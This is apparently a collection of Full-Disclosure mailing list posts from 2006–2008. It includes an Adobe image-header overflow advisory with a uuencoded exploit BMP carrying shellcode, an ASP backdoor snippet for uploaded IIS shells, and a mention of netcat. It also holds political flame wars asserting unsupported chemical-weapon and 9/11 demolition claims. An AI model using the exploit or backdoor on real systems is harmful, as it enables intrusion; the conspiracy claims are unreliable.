[Full-disclosure] Adobe Unchecked Overflow
Exploitable issue in various Adobe products c0ntex ([EMAIL PROTECTED]) Scott Laurie February 2008 Vulnerable applications, tested: Adobe Photoshop Album Starter Adobe After Effects CS3 Adobe Photoshop CS3 Not Vulnerable applications, tested: Adobe Reader Adobe Flash Player This bug is related to the parsing of header images, in that the applications do not verify that the image header is valid before trying to render it. This leaves an opportunity to cause an unchecked buffer overflow and allow for the execution of malicious code. All the issues are standard local overflows whereby an attacker can exploit a machine after sending the malicious image to the user, or by placing the image on a web site or email and waiting for a user to view it in one of the effected products. One fun thing with Album Starter is that it will run a service which will look for new devices being attached to the system, things like cameras or USB drives and when one is found it will check the device for image files. If some are found, the application will auto-run and import the images and thus allow the attacker to exploit locked workstations.. pretty lame but fun :) There is a caveats to the bug as the shellcode and return address need to be 4 byte values. Thus a return address of 0x41424344 needs to be in the following format: \x44\x44\x44\x44\x43\x43\x43\x43\x42\x42\x42\x42\x41\x41\x41\x41 Exploit attached for Album Starter 3.2 on Windows XP SP2 to pop calc.exe: Used shellcode is taken from the Metasploit project. begin 644 Adobe_AS_Exploit.bmp [EMAIL PROTECTED] M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04'\:NM-Z/[EMAIL PROTECTED])(M%/([EMAIL PROTECTED]/ M(M?(`'K28LTBP'N,9K(3`=[EMAIL PROTECTED]+K]#M4)AUY8M?)`'K9HL,2XM? M'`'K`RR+B6PD''#,=MDBT,PBT`,BW`K8M`[EMAIL PROTECTED],FAW MS)?5/_0:,OM_#M0_]9?B5F@T(`E5J`O_0:-D)]:U7_]934U-34T-30U/_ MT9H!-)F4XGAE6BDG#'5__6:A!15?_0:*2M+NE7_]935?_0:.5)ADE7_]90 M5%15_]3:.=YQGE7_]95_]!F:F1F:-MB5J4%DIS(GG:D2)XC'`\ZK^0BW^ M0BR3C7HXJZNK:'+^LQ;_=43_UEM74E%146H!45%54?_0:*W9!Y3_]9J__\W M_]+5_R#Q3_UE+_T[EMAIL PROTECTED] M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! M04%!04%!04%!04%!04%!04%!04%!04
Re: [Full-disclosure] Live is Live
Nothing new, been flawed for ever and shall remain so until the end of time :-) http://open-security.org/msn.JPG On 20/09/06, bluepill [EMAIL PROTECTED] wrote: http://www.live.com/?%3Ci%3E Oh my. Luckily this company doesn't produce anything people need to rely on in terms of security, such as... an OS, a database, a web server, a distributed online authentication system or something. _ Porn on your PC? Are you sure ? Scan your PC for FREE Now --- http://www.contentpurity.com/scanintro.htm --- PC running slower? Tons of pop-ups? You have spyware on your PC. Click here for a FREE SCAN! --- http://www.contentpurity.com/ccount/click.php?id=1 --- You may need to copy and paste the links about into your browser. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Good ASP backdoor?
Nothing spiffing but it works, %@ Page language=VB Debug=true aspcompat=true % % shell(C:\Program Files\WebApp\Uploads\owned.bat) % script runat=server Sub blah() Dim SpawnShell = server.CreateObject(WScript.Shell) SpawnShell.Run(C:\Program Files\WebApp\Uploads\owned.bat) End sub /script then just upload your tools and run via the bat file. Does the job. On 14/09/06, Jason Miller [EMAIL PROTECTED] wrote: http://replica-solutions.de/ has some php based ones, check it out On 9/14/06, Exibar [EMAIL PROTECTED] wrote: NetCat is a tried and true favorite - Original Message - From: Lachniet, Mark [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thursday, September 14, 2006 2:44 PM Subject: [Full-disclosure] Good ASP backdoor? Can anyone suggest a good backdoor for placing on a IIS server when you can upload a file to document root? For exapmle an all-in-one tool with upload, download, command execution, etc. There are several basic ones out there - I was wondering if anyone ever wrote a really spiffy one. Thanks in advance, Mark Lachniet ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE: OT - Check this out - Full disclosure is apt for this
Good sir, if what you say be true, show me your proof. Also, using your medical training, explain the injuries to the bodies in Falluja. Thanks :-) On 12/09/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Contex - If you consider that America are able to lie about the weapons of mass destruction and then admit it, America never lied about WMD. America is not in a position to prove that any WMD stockpiles existed past December of 1998, when Saddam kicked out the UN; but at worst that makes them wrong, not liars. = use chemical weapons in Iraq and lie about it and then admit it = America did not use Nerve Agents or Blister Agents in Iraq. Nerve Agents and Blister Agents are Chemical Waepons. Smoke Generators and tear gas are not. Unless of course you are seeking to redefine the word to fit a political agenda. On Wikipedia they also discuss the mans criminal history, what has that got to do with anything other than making the man seem unreliable. He IS unrealiable. He is also a fake. His criminal history is part of his backstory. On a personal note, speaking as someone who HAS served with the 3/75 Ranger Regiment, it is my opinion that after what he did to besmirch the honor of a Regiment that he never belonged to in the first place, he deserves to have his name dragged through the mud. HE brought it upon HIMSELF. == There are numerous other people who talk about the terror that has gone on in Iraq, including the use white phosphorous == White Phosphorous rounds are used to generate what is known as Quick Smoke. It's called Quick Smoke because WP rapidly generates thick white clouds of dense smoke and as such is useful for situations where you want to obscure the movement of friendly troops. For the record, I did not look that up on Wikipedia, it was part of my military Training as a Forward Observer. I am an expert of what is known as Indirect Fire Support and the ammunition used therein. So when I tell you that WP is a SMOKE GENERATOR and is neither a Chemical Weapon within the meaning of WMD, nor is it even remotely related to Napalm. You do your cause no favor when you join the Tinfoil Hat brigade. mail2web - Check your email from the web at http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RE: OT - Check this out - Full disclosure is apt for this
On 12/09/06, bkfsec [EMAIL PROTECTED] wrote: I think you two are using different definitions for Chemical Weapons, perhaps. I think so, though chemical weapons have been used. There are hundereds / thousands of bodies that have been melted almost to the bone, while their clothes are in flawless tact, some have other horrific injuries yet they same outcome, either skin has peeled away from the flesh of their bodies, while parts of their face, or limbs have melted away completly - others who are alive have abnormalities appearing, strange bulges in their limbs, one childs head has expanded (one who survived) yet the victims clothes are still undamaged, pretty neat bullets and pretty neat smoke. -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OT - Check this out - Full disclosure is apt for this
You are entitled to your opinion. On 11/09/06, Philosophil [EMAIL PROTECTED] wrote: A link to your own blog is not support for your argument. That's called circular reasoning. In addition, if you had bothered to do a little research, you would have noticed *huge* discrepancies. Try here: http://en.wikipedia.org/wiki/Jesse_Macbeth The unit he claimed he was in, was not deployed where he said it was. His flash (patches, unit designations) on his uniform are either put on incorrectly, not used by the division he claims to be in, and/or no longer used by the military. His uniform is wildly... well, inconsistent is the best word here. Some of the awards and citations he claims to have received would be impossible to earn in the time he was active. Really, I am constantly amazed by the lack of critical thinking people exhibit these days. It doesn't take long to find actual citations to back up a position. A loon talking in a video is *not* a credible source. Unfortunately, people want to believe something that backs their own opinions so much that they will take unsubstantiated stories as truth and use that as evidence. Of course when someone points out that evidence is fraud and fake... Well, at best the person gets ignored, at worst a tool of the vast neo-con conspiracy. (Seriously, given the governments track record at keeping things secret... a vast conspiracy is ridiculous at best) Hoax and fraud does nothing but weaken one's position regardless of that position's overall merits. On 9/11/06, c0ntex [EMAIL PROTECTED] wrote: http://noderat.spaces.live.com/blog/cns!6ADE4614B66EADD2!1321.entry On 11/09/06, Philosophil [EMAIL PROTECTED] wrote: Uh. You do realize this was a hoax, right? On 9/9/06, c0ntex [EMAIL PROTECTED] wrote: http://video.google.co.uk/videoplay?docid=-5587990522549547050 -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- regards c0ntex -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] OT - Check this out - Full disclosure is apt for this
If you consider that America are able to lie about the weapons of mass destruction and then admit it, use chemical weapons in Iraq and lie about it and then admit it, trick Saudi Arabia that Sadam Hussein was attacking their border to allow army convoys to be deployed in their country, mishandle Iraqs millions of dollars which seemed to vanish (which is currently under investigation with 3 confirmed arrests), a power company who coincidentally has a top US official on the board of directors win a multi million dollar contract with no competition to do ALL the power restoration work in Iraq. So America own the world with their porkies yet the most powerful country in the world is incapable of influencing 8 or 10 people about a war record which is controlled by the US government, influencing 1 man in charge of the IVAW (which they never actually deny this man was a member), and drop 2 news articles to Americans media to bad name this man then you have been eating too many pancakes and twinkies. On Wikipedia they also discuss the mans criminal history, what has that got to do with anything other than making the man seem unreliable. If you look at the media on my blog, you will notice many distressing issues, you will actually see innocent people being shot and the soldiers laughing on several occasions - it is not just this one video by this one man. The most well known behind the scenes investigation program Dispatches, from the UK does numerous documentaries on these issues, as well as the most highly credible news reporters - are they also telling porkies? I hardly think so. There are numerous other people who talk about the terror that has gone on in Iraq, including the use white phosphorous of which is then verified by 2 ex soldiers (US) along with live media footage of the drops, doctor examinations and leaked documents from the US and UK. but like I said, you are all entitled to your own opinions. On 11/09/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: --On September 11, 2006 8:20:51 PM +0100 c0ntex [EMAIL PROTECTED] wrote: You are entitled to your opinion. Yeah, and it sucks this his is fact-based, doesn't it? Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: OT - Check this out - Full disclosure is apt for this
Another: http://video.google.co.uk/videoplay?docid=-5702006622816922747 Makes me sick. On 10/09/06, c0ntex [EMAIL PROTECTED] wrote: http://video.google.co.uk/videoplay?docid=-5587990522549547050 -- regards c0ntex -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] OT - Check this out - Full disclosure is apt for this
http://video.google.co.uk/videoplay?docid=-5587990522549547050 -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] F-Secure to release XSS potential dangers
On 27/07/06, n3td3v [EMAIL PROTECTED] wrote: You missed the point of my post. That is highly probable. If you like, I can do you a great deal on a new DIY FBI (penetrator series) starter kit? it includes a magnifying glass, invisible ink, plastic handcuffs, a walki-talki which doubles as a water pistol, a whoopy cushion, Hacking Linux Exposed and a copy of WHAX. regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] F-Secure to release XSS potential dangers
On 26/07/06, n3td3v [EMAIL PROTECTED] wrote: F-Secure know the enemy of the Netscape web site are reading their blog: I see you notice that f-secure, a security company, have released information about a security bug - well spotted - next, you thoughtlessly share your opinion and disgust about said site advertising said information, then work a form of magic that surpasses even Harry Potters book of wizardry by sending /to a public mailing list/ a link to the same information. You then execute ./mounth -vv, apposed to the earlier ./mouth -v, providing a nice write-up about the bug, netscape and security for search bots to index. Netscape is d00med!! and it is all n3td3v's fault lol -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vunerability in yahoo webmail.
On 12/06/06, David Loyall [EMAIL PROTECTED] wrote: Oh, I've CC'd [EMAIL PROTECTED], but if someone else would give them a proper write-up, and encourage them to close the hole, that'd be wonderful. I know this guy who has over 7 years of direct security influence with Yahoo and Google security engineers! In 1972, a crack commando unit was sent to social prison by a mailing list for a claim they couldn't prove. These men promptly escaped from a maximum security stockade to the Moon. Today, still wanted by nobody other than their mommy, they survive playing soldiers of fortune. If you have a problem with Yahoo or any fortune 500 that may be hiring black hat hackers as part of internal espionage, if no one else can help, and if you can find them, maybe you can hire...The n3td3v Group -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ASLR now built into Vista
On 26/05/06, David Litchfield [EMAIL PROTECTED] wrote: Address Space Layout Randomization is now part of Vista as of beta 2 [1] . I wrote about ASLR on the Windows platform back in September last year [2] and noted that unless you rebase the image exe then little (not none!) is added. ASLR in Vista solves this so remote exploitation of overflows has just got a lot harder. I've not done a thorough analysis yet but, all going well, this is a fantastic way for Microsoft to go and builds on the work done with NX/DEP and stack cookies/canaries. Since ASLR has been in and has been trivially circumvented in Linux for years now (see my papers on return-to-libc return-to-got) I don't see it being a particularly hard issue to defeat :-) Maybe though, if they also randomise some other key areas like heap locations and do some fancy relocation to non writable/executable pages plus the drop-in of some ascii armour, we might then be on par with a hardened Linux or *BSD.. Granted, I haven't looked at Vista yet :) -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Black clouds over Sunnyvale go unchecked
this guy has hosted interviews and has successfully hired more hackers. there is also intelligence that he wants in the long run to hire more folks from a blackhat social background. i instant messaged and have been e-mailing yahoo core security team for a sustained period over the issue of the particular employee LOL, messaging Yahoo core security team - do you mean massaging? You truely are a nob jocky, saddle up and ride into the sunset you bafoon. -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] **LosseChange::Debunk it??**
WTC 7 was demolished at 5pm or there abouts by controlled demolition. The owner of the building admits that they decided to pull it and the reason because so many people had been killed in the other 2 towers. Odd reason, considering what information was stored there. Check it out at http://www.911revisited.com/video.html On 18/05/06, Ducki3 [EMAIL PROTECTED] wrote: Apparently so, since we'll swallow any cockamamie conspiracy theory that comes along. Paul, I am not saying I believe all the conspiracy Theories or that the government was behind it. I don't really know. But I do know from reading the government Northwood documents that it isn't beyond the governments thoughts to attempt something like this. I know it doesn't mean they did but it does mean they have thought of doing this. All I am saying is that it is a possibility and while the counter evidence you provided is plausible on why the towers collapsed. Sure, I understand that the amount of Jet fuel spread so quickly on the whole floor caused structural failure of the trusses causing the building to collapse. But I am trying to dig up why WTC 7 collapsed when it didn't have raging jet fuel fire burning through it. The document didn't explain that part. Val's comment was that many buildings have collapsed from neighboring fires like the Chicago fire of 1871. As for Chicago Fire of 1871, yes most of the buildings were gutted out from fire. These are buildings that are pre 20th century. Made with what? Wood, brick, some steel? I am trying to find a more modern case of a building collapsing (not gutted) of structural fire (besides the obvious two towers which a plausible case was already made). The eye witness accounts of the Pentagon crash. There are indeed numerous accounts all of which contradict each other. Some people saw American Airlines, some people saw a commuter looking plane in the area, some a C-130 overhead. Control towers say the plane was maneuvering too fast to be an airliner. So I don't buy into any of the eye witness accounts of either side, I wasn't there. I do know that it's possibly on tape somewhere that government will not release for whatever security reasons. They did release a 4 frame clip from the parking lot camera that shows no plane in it. That does no good. There are too many things to debate and piece together (WTC 7, Cell phones at high altitudes, Pre warning messages, Northwood, Pentagon Holes, Collapse rates, etc.) and some of the conspiracy is utter bull and some seems plausible to me. I guess it's up to every individual to make that conclusion on their own by looking at BOTH sides, not one. And I'm not applying this to you Paul but in general because I don't know what you have read and what you haven't but when people haven't examine both sides and all of the theories then you have ceased to be a free thinker. Because there isn't just 1 or 2 subjects in this conspiracy theory. There is more than a few dozen. Peace, Ducki3 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] **LosseChange::Debunk it??**
http://www.911revisited.com/video.html :-( -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Let's Not Forget Whose In Charge
On 06/05/06, redsand [EMAIL PROTECTED] wrote: I just wanted to remind everyone how this mailing list USED to be. Remember when it USED to be better? Cooler? Faster? Stronger? Back when all those nifty cool 1-day and 0-day exploits were dropped randomly just so we could watch the security industry scramble to take cover? Boy THOSE were the days!!! http://blacksecurity.org 3++ -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Fwd: [Full-disclosure] Internet Explorer User Interface Races, Redeux
On 27/04/06, n3td3v [EMAIL PROTECTED] wrote: more useless garbage, and more and more and more. Just gonnae no' - damn my pixels are wasting away with your nonsense, if you wanna bitch to the guy, email him directly. This list isn't designed for your drivvel and your emails are 99% off topic here, so with my warmest, heart felt intesrest in your welfare, have a cup of scalding stfu. I realise me emailing is off topic too, but I am hoping that if I complain about you as often as you post junk here, I might become as famous as you and all the top websites will know who I am and will realise I too, like you, am a true hacker releasing top rated, high profile posts to the list. You might just trampoline my career to an all-time high :-) -- regards c0ntex -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Internet Explorer User Interface Races, Redeux
Oh, and my mate thinks your a nob jockey lol On 27/04/06, c0ntex [EMAIL PROTECTED] wrote: On 27/04/06, n3td3v [EMAIL PROTECTED] wrote: more useless garbage, and more and more and more. Just gonnae no' - damn my pixels are wasting away with your nonsense, if you wanna bitch to the guy, email him directly. This list isn't designed for your drivvel and your emails are 99% off topic here, so with my warmest, heart felt intesrest in your welfare, have a cup of scalding stfu. I realise me emailing is off topic too, but I am hoping that if I complain about you as often as you post junk here, I might become as famous as you and all the top websites will know who I am and will realise I too, like you, am a true hacker releasing top rated, high profile posts to the list. You might just trampoline my career to an all-time high :-) -- regards c0ntex -- regards c0ntex -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Remote Xine Format String Vulnerability
http://www.open-security.org/advisories/16 -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] info about recent Ms issue
On 14/04/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: this is not a vulnerability for MS because the .hlp file is a script file and they believe that's not secured at all, c0ntex just posted a fresh advisory of something wich has been found years ago, disclosed hundred of times, but he looks to have time to loose. Where is the heap overflow in Windows Help that has been discussed thousands of times? I never once discussed the scriptable issue with .hlp files because that is not my interest, my interest is in manipulating process execution by overwriting memory. Your english is good enough to talk bollox but obviously not good enough to read. Anyway, 4 more Windows heap overflows coming on their way just awaiting your criticism :-) -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Windows Help Heap Overflow
http://www.open-security.org/advisories/15 -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Advisory # x Thu Mar 16 21:05:55 EST 2006 x # Heap Overflow in Microsoft Windows 2003
Advisory # x Thu Mar 16 21:05:55 EST 2006 x # Heap Overflow in Microsoft Windows 2003 APPENDIX A VENDOR INFORMATION http://www.microsoft.com CONTACT c0ntex [EMAIL PROTECTED] 1-888-565-9428 BEWARE THE JIZZTAPO!!! .. _ .' `. /\) / / / / /\ \ \ / \ _ \ \/ /\ \ (/\ \ / \ \ \ \ / \ (Y ) \ \/ /\ \ \ / \ \ \/ / / / / ( Y) CISSP CCE GREM SSP-MPA GHTQ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MS06-06 Windows Media Player Exploitation
On 17/02/06, H D Moore [EMAIL PROTECTED] wrote: ... the non-alpha prefix is only used if you dont pass GETPCTYPE=win32 for PexAlphaNum or GETPCTYPE=seh for Alpha2. Yea, exactly, used msfpayload (non-web) and it works perfectly - thank you HD -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MS06-06 Windows Media Player Exploitation
On 17/02/06, c0ntex [EMAIL PROTECTED] wrote: Yea, exactly, used msfpayload (non-web) and it works perfectly - thank you HD oops, msfpayload msfencode. -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MS06-06 Windows Media Player Exploitation
No exploit, just some basic research - anyone with 100% Ascii win32 shellcode? http://open-security.org/winmedia/index.html -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MS06-06 Windows Media Player Exploitation
On 16/02/06, H D Moore [EMAIL PROTECTED] wrote: Still getting some annoying crashes (SEH trick in alphanum code is annoying when you are trying to debug something...), but the basic solution is: Ye, we are on the same path if you looked at my notes, SEH works flawlessly and can redirect no problem, but getting the stable location to have it go is the problem. I had to reject the pass shellcode in the src= method as I am finding your Alpha shellcode skechy and not 100% alpha :p due to the FF and other annoying characters, which cause it to bork. I'm working on another method which is looking more realistic but I need to wait til tomorrow now as I need to sleep :) -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure]POSITIF-securityframework
On 27/01/06, POSITIF [EMAIL PROTECTED] wrote: Hello, We would like to present the POSITIF project to all Full-disclosure members. http://www.positif.org/iwhat.html 7 Million Euros. Happy new year! -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] private imap4d exploit
On 23/01/06, J.A. Terranson [EMAIL PROTECTED] wrote: No, it was mine! printf([!] mailutils imapd4d universal(?) exploit 0.5 by c0ntex\n); Yet, I found *this* in my older files: printf([!] mailutils imapd4d universal(?) exploit 0.5 by n3td3v\n); Will the REAL code theif, please stand up? lol -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] private imap4d exploit
On 22/01/06, crash-x gay [EMAIL PROTECTED] wrote: Don't lie crash-x we all know you ripped the code off rave and changed the printf()'s to make it look like yours. You even admit to changing it again now!!! ravecool wrote this code - crash-x is a code thief!!! rave deserves the credit for this exploit as he is the real hacker here. No, it was mine! printf([!] mailutils imapd4d universal(?) exploit 0.5 by c0ntex\n); regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: what we REALLY learned from WMF
On 06/01/06, Gadi Evron [EMAIL PROTECTED] wrote: I am just saying that we as an industry got used to False Positives, slow responses, etc. We should demand more and this situation proved it is possible. I doubt your industry had anything to do with it. Someone running a cost-out project probably discovered they could save a few 100k by reducing support requests via call centers and email bandwidth if they dropped it, and in return got themselves a nice PM / consolidation job with an office, a view and a parking space.. -- regards c0ntex ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Unzip *ALL* verisons ;))
